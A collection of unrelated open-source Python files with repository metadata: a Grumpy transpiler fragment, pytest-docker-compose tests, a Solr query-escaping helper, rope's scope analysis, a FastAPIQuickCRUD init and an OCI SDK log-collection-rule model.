else:
raise NotImplementedError()
deps = set(deps).difference(_get_parent_packages(modname))
if update_cache:
try:
with open(pep3147_folders['dependencies_file'], 'wb') as deps_dumpfile:
pickle.dump((deps, import_objects), deps_dumpfile)
except Exception as err:
logger.warning("Could not store dependencies of '%s' on cache: %s", modname, err)
else:
logger.debug("Dependencies file regenerated")
return deps, import_objects
def _recursively_transpile(import_objects, ignore=None):
ignore = ignore or set()
for imp_obj in import_objects:
if not imp_obj.is_native:
name = imp_obj.name[1:] if imp_obj.name.startswith('.') else imp_obj.name
if imp_obj.name in ignore:
# logger.debug("Already collected '%s'. Ignoring", imp_obj.name)
continue # Do not do cyclic imports
if not imp_obj.script:
logger.debug("Importing '%s' will raise ImportError", imp_obj.name)
ignore.add(imp_obj.name)
continue # Let the ImportError raise on run time
# Recursively compile the discovered imports
result = main(stream=open(imp_obj.script), modname=name, pep3147=True,
recursive=True, return_gocode=False, return_deps=True,
ignore=ignore)
if name.endswith('.__init__'):
name = name.rpartition('.__init__')[0]
result = main(stream=open(imp_obj.script), modname=name, pep3147=True,
recursive=True, return_gocode=False, return_deps=True,
ignore=ignore)
yield result['deps']
def _transpile(script, modname, imports, visitor, mod_block):
file_buffer = StringIO()
writer = util.Writer(file_buffer)
tmpl = textwrap.dedent("""\
package $package
import (
\tπg "grumpy"
$imports
)
var Code *πg.Code
func init() {
\tCode = πg.NewCode("<module>", $script, nil, 0, func(πF *πg.Frame, _ []*πg.Object) (*πg.Object, *πg.BaseException) {
\t\tvar πR *πg.Object; _ = πR
\t\tvar πE *πg.BaseException; _ = πE""")
writer.write_tmpl(tmpl, package=fixed_keyword(modname.split('.')[-1]),
script=util.go_str(script), imports=imports)
with writer.indent_block(2):
for s in sorted(mod_block.strings):
writer.write('ß{} := πg.InternStr({})'.format(s, util.go_str(s)))
writer.write_temp_decls(mod_block)
writer.write_block(mod_block, visitor.writer.getvalue())
writer.write_tmpl(textwrap.dedent("""\
\t\treturn nil, πE
\t})
\tπg.RegisterModule($modname, Code)
}"""), modname=util.go_str(modname))
return file_buffer
def main(stream=None, modname=None, pep3147=False, recursive=False, return_gocode=True, ignore=None, return_deps=False):
ignore = ignore or set()
ignore.add(modname)
script = os.path.abspath(stream.name)
assert script and modname, 'Script "%s" or Modname "%s" is empty' % (script, modname)
gopath = os.getenv('GOPATH', None)
if not gopath:
raise RuntimeError('GOPATH not set')
pep3147_folders = make_transpiled_module_folders(script, modname)
will_refresh = should_refresh(stream, script, modname)
deps, import_objects = _collect_deps(script, modname, pep3147_folders, from_cache=(not will_refresh))
deps = set(deps)
imports = ''.join('\t// _ "' + _package_name(name) + '"\n' for name in deps)
if will_refresh or return_gocode:
visitor, mod_block = _parse_and_visit(stream, script, modname)
file_buffer = _transpile(script, modname, imports, visitor, mod_block)
else:
file_buffer = None
if recursive:
transitive_deps = _recursively_transpile(import_objects, ignore=ignore)
if pep3147:
new_gopath = pep3147_folders['gopath_folder']
if new_gopath not in os.environ['GOPATH'].split(os.pathsep):
os.environ['GOPATH'] += os.pathsep + new_gopath
if file_buffer:
file_buffer.seek(0)
mod_dir = pep3147_folders['transpiled_module_folder']
with open(os.path.join(mod_dir, 'module.go'), 'w+') as transpiled_file:
transpiled_file.write(file_buffer.read())
set_checksum(stream, script, modname)
result = {}
if return_gocode:
assert file_buffer, "Wrong logic paths. 'file_buffer' should be available here!"
file_buffer.seek(0)
result['gocode'] = file_buffer.read()
if return_deps:
result['deps'] = frozenset(deps.union(*transitive_deps))
return result
def _package_name(modname):
if modname.startswith('__go__/'):
return '__python__/' + modname
return '__python__/' + fixed_keyword(modname).replace('.', '/')
def _get_parent_packages(modname):
package_parts = modname.split('.')
parent_parts = package_parts[:-1]
for i, _ in enumerate(parent_parts):
yield '.'.join(parent_parts[:(-i or None)])
|
tests/pytest_docker_compose_tests/test_module_scoping_fixtures.py
|
mathieu-lemay/pytest-docker-compose
| 142 |
89026
|
import time
import requests
from urllib.parse import urljoin
from urllib3.util.retry import Retry
from requests.adapters import HTTPAdapter
import pytest
pytest_plugins = ["docker_compose"]
@pytest.fixture(scope="module")
def wait_for_api(module_scoped_container_getter):
"""Wait for the api from my_api_service to become responsive"""
request_session = requests.Session()
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[500, 502, 503, 504])
request_session.mount('http://', HTTPAdapter(max_retries=retries))
service = module_scoped_container_getter.get("my_api_service").network_info[0]
api_url = "http://%s:%s/" % (service.hostname, service.host_port)
assert request_session.get(api_url)
start = time.time()
while 'Exit' not in module_scoped_container_getter.get("my_short_lived_service").human_readable_state:
if time.time() - start >= 5:
raise RuntimeError(
'my_short_lived_service should spin up, echo "Echoing" and '
'then shut down, since it still running something went wrong'
)
time.sleep(.5)
return request_session, api_url
@pytest.fixture
def do_an_insert(wait_for_api):
"""Insert data to the database in the container my_db"""
request_session, api_url = wait_for_api
item_url = 'items/1'
data_string = 'some_data'
request_session.put('%s%s?data_string=%s' % (api_url, item_url, data_string))
yield item_url, data_string
request_session.delete(urljoin(api_url, item_url)).json()
def test_read_an_item(wait_for_api, do_an_insert):
request_session, api_url = wait_for_api
item_url, data_string = do_an_insert
item = request_session.get(api_url + item_url).json()
assert item['data'] == data_string
def test_read_and_write(wait_for_api):
request_session, api_url = wait_for_api
data_string = 'some_other_data'
request_session.put('%sitems/2?data_string=%s' % (api_url, data_string))
item = request_session.get(urljoin(api_url, 'items/2')).json()
assert item['data'] == data_string
request_session.delete(urljoin(api_url, 'items/2'))
def test_read_all(wait_for_api):
request_session, api_url = wait_for_api
assert len(request_session.get(urljoin(api_url, 'items/all')).json()) == 0
if __name__ == '__main__':
pytest.main(['--docker-compose', './my_network', '--docker-compose-no-build'])
|
ltr/helpers/solr_escape.py
|
tanjie123/hello-ltr
| 109 |
89029
|
<filename>ltr/helpers/solr_escape.py
def esc_kw(kw):
""" Take a keyword and escape all the
Solr parts we want to escape!"""
kw = kw.replace('\\', '\\\\') # be sure to do this first, as we inject \!
kw = kw.replace('(', '\(')
kw = kw.replace(')', '\)')
kw = kw.replace('+', '\+')
kw = kw.replace('-', '\-')
kw = kw.replace(':', '\:')
kw = kw.replace('/', '\/')
kw = kw.replace(']', '\]')
kw = kw.replace('[', '\[')
kw = kw.replace('*', '\*')
kw = kw.replace('?', '\?')
kw = kw.replace('{', '\{')
kw = kw.replace('}', '\}')
kw = kw.replace('~', '\~')
return kw
|
blackmamba/lib/rope/base/pyscopes.py
|
oz90210/blackmamba
| 463 |
89030
|
<filename>blackmamba/lib/rope/base/pyscopes.py
import rope.base.builtins
import rope.base.codeanalyze
import rope.base.pynames
from rope.base import ast, exceptions, utils
class Scope(object):
def __init__(self, pycore, pyobject, parent_scope):
self.pycore = pycore
self.pyobject = pyobject
self.parent = parent_scope
def get_names(self):
"""Return the names defined or imported in this scope"""
return self.pyobject.get_attributes()
def get_defined_names(self):
"""Return the names defined in this scope"""
return self.pyobject._get_structural_attributes()
def get_name(self, name):
"""Return name `PyName` defined in this scope"""
if name not in self.get_names():
raise exceptions.NameNotFoundError('name %s not found' % name)
return self.get_names()[name]
def __getitem__(self, key):
"""The same as ``get_name(key)``"""
return self.get_name(key)
def __contains__(self, key):
"""The same as ``key in self.get_names()``"""
return key in self.get_names()
@utils.saveit
def get_scopes(self):
"""Return the subscopes of this scope
The returned scopes should be sorted by the order they appear.
"""
return self._create_scopes()
def lookup(self, name):
if name in self.get_names():
return self.get_names()[name]
if self.parent is not None:
return self.parent._propagated_lookup(name)
return None
def get_propagated_names(self):
"""Return the visible names of this scope
Return the names defined in this scope that are visible from
scopes containing this scope. This method returns the same
dictionary returned by `get_names()` except for `ClassScope`
which returns an empty dict.
"""
return self.get_names()
def _propagated_lookup(self, name):
if name in self.get_propagated_names():
return self.get_propagated_names()[name]
if self.parent is not None:
return self.parent._propagated_lookup(name)
return None
def _create_scopes(self):
return [pydefined.get_scope()
for pydefined in self.pyobject._get_defined_objects()]
def _get_global_scope(self):
current = self
while current.parent is not None:
current = current.parent
return current
def get_start(self):
return self.pyobject.get_ast().lineno
def get_body_start(self):
body = self.pyobject.get_ast().body
if body:
return body[0].lineno
return self.get_start()
def get_end(self):
pymodule = self._get_global_scope().pyobject
return pymodule.logical_lines.logical_line_in(self.logical_end)[1]
@utils.saveit
def get_logical_end(self):
global_scope = self._get_global_scope()
return global_scope._scope_finder.find_scope_end(self)
start = property(get_start)
end = property(get_end)
logical_end = property(get_logical_end)
def get_kind(self):
pass
class GlobalScope(Scope):
def __init__(self, pycore, module):
super(GlobalScope, self).__init__(pycore, module, None)
self.names = module._get_concluded_data()
def get_start(self):
return 1
def get_kind(self):
return 'Module'
def get_name(self, name):
try:
return self.pyobject[name]
except exceptions.AttributeNotFoundError:
if name in self.builtin_names:
return self.builtin_names[name]
raise exceptions.NameNotFoundError('name %s not found' % name)
def get_names(self):
if self.names.get() is None:
result = dict(self.builtin_names)
result.update(super(GlobalScope, self).get_names())
self.names.set(result)
return self.names.get()
def get_inner_scope_for_line(self, lineno, indents=None):
return self._scope_finder.get_holding_scope(self, lineno, indents)
def get_inner_scope_for_offset(self, offset):
return self._scope_finder.get_holding_scope_for_offset(self, offset)
@property
@utils.saveit
def _scope_finder(self):
return _HoldingScopeFinder(self.pyobject)
@property
def builtin_names(self):
return rope.base.builtins.builtins.get_attributes()
class FunctionScope(Scope):
def __init__(self, pycore, pyobject, visitor):
super(FunctionScope, self).__init__(pycore, pyobject,
pyobject.parent.get_scope())
self.names = None
self.returned_asts = None
self.is_generator = None
self.defineds = None
self.visitor = visitor
def _get_names(self):
if self.names is None:
self._visit_function()
return self.names
def _visit_function(self):
if self.names is None:
new_visitor = self.visitor(self.pycore, self.pyobject)
for n in ast.get_child_nodes(self.pyobject.get_ast()):
ast.walk(n, new_visitor)
self.names = new_visitor.names
self.names.update(self.pyobject.get_parameters())
self.returned_asts = new_visitor.returned_asts
self.is_generator = new_visitor.generator
self.defineds = new_visitor.defineds
def _get_returned_asts(self):
if self.names is None:
self._visit_function()
return self.returned_asts
def _is_generator(self):
if self.is_generator is None:
self._get_returned_asts()
return self.is_generator
def get_names(self):
return self._get_names()
def _create_scopes(self):
if self.defineds is None:
self._visit_function()
return [pydefined.get_scope() for pydefined in self.defineds]
def get_kind(self):
return 'Function'
def invalidate_data(self):
for pyname in self.get_names().values():
if isinstance(pyname, (rope.base.pynames.AssignedName,
rope.base.pynames.EvaluatedName)):
pyname.invalidate()
class ClassScope(Scope):
def __init__(self, pycore, pyobject):
super(ClassScope, self).__init__(pycore, pyobject,
pyobject.parent.get_scope())
def get_kind(self):
return 'Class'
def get_propagated_names(self):
return {}
class _HoldingScopeFinder(object):
def __init__(self, pymodule):
self.pymodule = pymodule
def get_indents(self, lineno):
return rope.base.codeanalyze.count_line_indents(
self.lines.get_line(lineno))
def _get_scope_indents(self, scope):
return self.get_indents(scope.get_start())
def get_holding_scope(self, module_scope, lineno, line_indents=None):
if line_indents is None:
line_indents = self.get_indents(lineno)
current_scope = module_scope
new_scope = current_scope
while new_scope is not None and \
(new_scope.get_kind() == 'Module' or
self._get_scope_indents(new_scope) <= line_indents):
current_scope = new_scope
if current_scope.get_start() == lineno and \
current_scope.get_kind() != 'Module':
return current_scope
new_scope = None
for scope in current_scope.get_scopes():
if scope.get_start() <= lineno:
if lineno <= scope.get_end():
new_scope = scope
break
else:
break
return current_scope
def _is_empty_line(self, lineno):
line = self.lines.get_line(lineno)
return line.strip() == '' or line.lstrip().startswith('#')
def _get_body_indents(self, scope):
return self.get_indents(scope.get_body_start())
def get_holding_scope_for_offset(self, scope, offset):
return self.get_holding_scope(
scope, self.lines.get_line_number(offset))
def find_scope_end(self, scope):
if not scope.parent:
return self.lines.length()
end = scope.pyobject.get_ast().body[-1].lineno
scope_start = self.pymodule.logical_lines.logical_line_in(scope.start)
if scope_start[1] >= end:
# handling one-liners
body_indents = self._get_scope_indents(scope) + 4
else:
body_indents = self._get_body_indents(scope)
for l in self.logical_lines.generate_starts(
min(end + 1, self.lines.length()), self.lines.length() + 1):
if not self._is_empty_line(l):
if self.get_indents(l) < body_indents:
return end
else:
end = l
return end
@property
def lines(self):
return self.pymodule.lines
@property
def code(self):
return self.pymodule.source_code
@property
def logical_lines(self):
return self.pymodule.logical_lines
class TemporaryScope(Scope):
"""Currently used for list comprehensions and generator expressions
These scopes do not appear in the `get_scopes()` method of their
parent scopes.
"""
def __init__(self, pycore, parent_scope, names):
super(TemporaryScope, self).__init__(
pycore, parent_scope.pyobject, parent_scope)
self.names = names
def get_names(self):
return self.names
def get_defined_names(self):
return self.names
def _create_scopes(self):
return []
def get_kind(self):
return 'Temporary'
|
src/fastapi_quickcrud/__init__.py
|
aebrahim/FastAPIQuickCRUD
| 123 |
89051
|
from .misc.utils import sqlalchemy_to_pydantic
from .crud_router import crud_router_builder
from .misc.type import CrudMethods
|
src/oci/log_analytics/models/create_log_analytics_object_collection_rule_details.py
|
ezequielramos/oci-python-sdk
| 249 |
89073
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateLogAnalyticsObjectCollectionRuleDetails(object):
"""
The configuration details of collection rule to enable automatic log collection from an object storage bucket.
"""
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "LIVE"
COLLECTION_TYPE_LIVE = "LIVE"
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "HISTORIC"
COLLECTION_TYPE_HISTORIC = "HISTORIC"
#: A constant which can be used with the collection_type property of a CreateLogAnalyticsObjectCollectionRuleDetails.
#: This constant has a value of "HISTORIC_LIVE"
COLLECTION_TYPE_HISTORIC_LIVE = "HISTORIC_LIVE"
def __init__(self, **kwargs):
"""
Initializes a new CreateLogAnalyticsObjectCollectionRuleDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param name:
The value to assign to the name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type name: str
:param description:
The value to assign to the description property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type description: str
:param compartment_id:
The value to assign to the compartment_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type compartment_id: str
:param os_namespace:
The value to assign to the os_namespace property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type os_namespace: str
:param os_bucket_name:
The value to assign to the os_bucket_name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type os_bucket_name: str
:param collection_type:
The value to assign to the collection_type property of this CreateLogAnalyticsObjectCollectionRuleDetails.
Allowed values for this property are: "LIVE", "HISTORIC", "HISTORIC_LIVE"
:type collection_type: str
:param poll_since:
The value to assign to the poll_since property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type poll_since: str
:param poll_till:
The value to assign to the poll_till property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type poll_till: str
:param log_group_id:
The value to assign to the log_group_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type log_group_id: str
:param log_source_name:
The value to assign to the log_source_name property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type log_source_name: str
:param entity_id:
The value to assign to the entity_id property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type entity_id: str
:param char_encoding:
The value to assign to the char_encoding property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type char_encoding: str
:param is_enabled:
The value to assign to the is_enabled property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type is_enabled: bool
:param overrides:
The value to assign to the overrides property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type overrides: dict(str, list[PropertyOverride])
:param object_name_filters:
The value to assign to the object_name_filters property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type object_name_filters: list[str]
:param defined_tags:
The value to assign to the defined_tags property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type defined_tags: dict(str, dict(str, object))
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type freeform_tags: dict(str, str)
"""
self.swagger_types = {
'name': 'str',
'description': 'str',
'compartment_id': 'str',
'os_namespace': 'str',
'os_bucket_name': 'str',
'collection_type': 'str',
'poll_since': 'str',
'poll_till': 'str',
'log_group_id': 'str',
'log_source_name': 'str',
'entity_id': 'str',
'char_encoding': 'str',
'is_enabled': 'bool',
'overrides': 'dict(str, list[PropertyOverride])',
'object_name_filters': 'list[str]',
'defined_tags': 'dict(str, dict(str, object))',
'freeform_tags': 'dict(str, str)'
}
self.attribute_map = {
'name': 'name',
'description': 'description',
'compartment_id': 'compartmentId',
'os_namespace': 'osNamespace',
'os_bucket_name': 'osBucketName',
'collection_type': 'collectionType',
'poll_since': 'pollSince',
'poll_till': 'pollTill',
'log_group_id': 'logGroupId',
'log_source_name': 'logSourceName',
'entity_id': 'entityId',
'char_encoding': 'charEncoding',
'is_enabled': 'isEnabled',
'overrides': 'overrides',
'object_name_filters': 'objectNameFilters',
'defined_tags': 'definedTags',
'freeform_tags': 'freeformTags'
}
self._name = None
self._description = None
self._compartment_id = None
self._os_namespace = None
self._os_bucket_name = None
self._collection_type = None
self._poll_since = None
self._poll_till = None
self._log_group_id = None
self._log_source_name = None
self._entity_id = None
self._char_encoding = None
self._is_enabled = None
self._overrides = None
self._object_name_filters = None
self._defined_tags = None
self._freeform_tags = None
@property
def name(self):
"""
**[Required]** Gets the name of this CreateLogAnalyticsObjectCollectionRuleDetails.
A unique name given to the rule. The name must be unique within the tenancy, and cannot be modified.
:return: The name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateLogAnalyticsObjectCollectionRuleDetails.
A unique name given to the rule. The name must be unique within the tenancy, and cannot be modified.
:param name: The name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._name = name
@property
def description(self):
"""
Gets the description of this CreateLogAnalyticsObjectCollectionRuleDetails.
A string that describes the details of the rule. It does not have to be unique, and can be changed.
Avoid entering confidential information.
:return: The description of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this CreateLogAnalyticsObjectCollectionRuleDetails.
A string that describes the details of the rule. It does not have to be unique, and can be changed.
Avoid entering confidential information.
:param description: The description of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._description = description
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
The `OCID`__ of the compartment to which this rule belongs.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
The `OCID`__ of the compartment to which this rule belongs.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def os_namespace(self):
"""
**[Required]** Gets the os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
Object Storage namespace.
:return: The os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._os_namespace
@os_namespace.setter
def os_namespace(self, os_namespace):
"""
Sets the os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
Object Storage namespace.
:param os_namespace: The os_namespace of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._os_namespace = os_namespace
@property
def os_bucket_name(self):
"""
**[Required]** Gets the os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Object Storage bucket.
:return: The os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._os_bucket_name
@os_bucket_name.setter
def os_bucket_name(self, os_bucket_name):
"""
Sets the os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Object Storage bucket.
:param os_bucket_name: The os_bucket_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._os_bucket_name = os_bucket_name
@property
def collection_type(self):
"""
Gets the collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
The type of collection.
Allowed values for this property are: "LIVE", "HISTORIC", "HISTORIC_LIVE"
:return: The collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._collection_type
@collection_type.setter
def collection_type(self, collection_type):
"""
Sets the collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
The type of collection.
:param collection_type: The collection_type of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
allowed_values = ["LIVE", "HISTORIC", "HISTORIC_LIVE"]
if not value_allowed_none_or_none_sentinel(collection_type, allowed_values):
raise ValueError(
"Invalid value for `collection_type`, must be None or one of {0}"
.format(allowed_values)
)
self._collection_type = collection_type
@property
def poll_since(self):
"""
Gets the poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
The oldest time of the file in the bucket to consider for collection.
Accepted values are: BEGINNING or CURRENT_TIME or RFC3339 formatted datetime string.
Use this for HISTORIC or HISTORIC_LIVE collection types. When collectionType is LIVE, specifying pollSince value other than CURRENT_TIME will result in error.
:return: The poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._poll_since
@poll_since.setter
def poll_since(self, poll_since):
"""
Sets the poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
The oldest time of the file in the bucket to consider for collection.
Accepted values are: BEGINNING or CURRENT_TIME or RFC3339 formatted datetime string.
Use this for HISTORIC or HISTORIC_LIVE collection types. When collectionType is LIVE, specifying pollSince value other than CURRENT_TIME will result in error.
:param poll_since: The poll_since of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._poll_since = poll_since
@property
def poll_till(self):
"""
Gets the poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
The newest time of the file in the bucket to consider for collection.
Accepted values are: CURRENT_TIME or RFC3339 formatted datetime string.
Use this for HISTORIC collection type. When collectionType is LIVE or HISTORIC_LIVE, specifying pollTill will result in error.
:return: The poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._poll_till
@poll_till.setter
def poll_till(self, poll_till):
"""
Sets the poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
The newest time of the file in the bucket to consider for collection.
Accepted values are: CURRENT_TIME or RFC3339 formatted datetime string.
Use this for HISTORIC collection type. When collectionType is LIVE or HISTORIC_LIVE, specifying pollTill will result in error.
:param poll_till: The poll_till of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._poll_till = poll_till
@property
def log_group_id(self):
"""
**[Required]** Gets the log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics Log group OCID to associate the processed logs with.
:return: The log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""
Sets the log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics Log group OCID to associate the processed logs with.
:param log_group_id: The log_group_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_source_name(self):
"""
**[Required]** Gets the log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Logging Analytics Source to use for the processing.
:return: The log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._log_source_name
@log_source_name.setter
def log_source_name(self, log_source_name):
"""
Sets the log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
Name of the Logging Analytics Source to use for the processing.
:param log_source_name: The log_source_name of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._log_source_name = log_source_name
@property
def entity_id(self):
"""
Gets the entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics entity OCID. Associates the processed logs with the given entity (optional).
:return: The entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""
Sets the entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
Logging Analytics entity OCID. Associates the processed logs with the given entity (optional).
:param entity_id: The entity_id of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._entity_id = entity_id
@property
def char_encoding(self):
"""
Gets the char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
An optional character encoding to aid in detecting the character encoding of the contents of the objects while processing.
It is recommended to set this value as ISO_8859_1 when configuring content of the objects having more numeric characters,
and very few alphabets.
For e.g. this applies when configuring VCN Flow Logs.
:return: The char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: str
"""
return self._char_encoding
@char_encoding.setter
def char_encoding(self, char_encoding):
"""
Sets the char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
An optional character encoding to aid in detecting the character encoding of the contents of the objects while processing.
It is recommended to set this value as ISO_8859_1 when configuring content of the objects having more numeric characters,
and very few alphabets.
For e.g. this applies when configuring VCN Flow Logs.
:param char_encoding: The char_encoding of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: str
"""
self._char_encoding = char_encoding
@property
def is_enabled(self):
"""
Gets the is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
Whether or not this rule is currently enabled.
:return: The is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: bool
"""
return self._is_enabled
@is_enabled.setter
def is_enabled(self, is_enabled):
"""
Sets the is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
Whether or not this rule is currently enabled.
:param is_enabled: The is_enabled of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: bool
"""
self._is_enabled = is_enabled
@property
def overrides(self):
"""
Gets the overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
The override is used to modify some important configuration properties for objects matching a specific pattern inside the bucket.
Supported propeties for override are: logSourceName, charEncoding, entityId.
Supported matchType for override are \"contains\".
:return: The overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, list[PropertyOverride])
"""
return self._overrides
@overrides.setter
def overrides(self, overrides):
"""
Sets the overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
The override is used to modify some important configuration properties for objects matching a specific pattern inside the bucket.
Supported propeties for override are: logSourceName, charEncoding, entityId.
Supported matchType for override are \"contains\".
:param overrides: The overrides of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, list[PropertyOverride])
"""
self._overrides = overrides
@property
def object_name_filters(self):
"""
Gets the object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
When the filters are provided, only the objects matching the filters are picked up for processing.
The matchType supported is exact match and accommodates wildcard \"*\".
For more information on filters, see `Event Filters`__.
__ https://docs.oracle.com/en-us/iaas/Content/Events/Concepts/filterevents.htm
:return: The object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: list[str]
"""
return self._object_name_filters
@object_name_filters.setter
def object_name_filters(self, object_name_filters):
"""
Sets the object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
When the filters are provided, only the objects matching the filters are picked up for processing.
The matchType supported is exact match and accommodates wildcard \"*\".
For more information on filters, see `Event Filters`__.
__ https://docs.oracle.com/en-us/iaas/Content/Events/Concepts/filterevents.htm
:param object_name_filters: The object_name_filters of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: list[str]
"""
self._object_name_filters = object_name_filters
@property
def defined_tags(self):
"""
Gets the defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:return: The defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:param defined_tags: The defined_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:return: The freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:param freeform_tags: The freeform_tags of this CreateLogAnalyticsObjectCollectionRuleDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
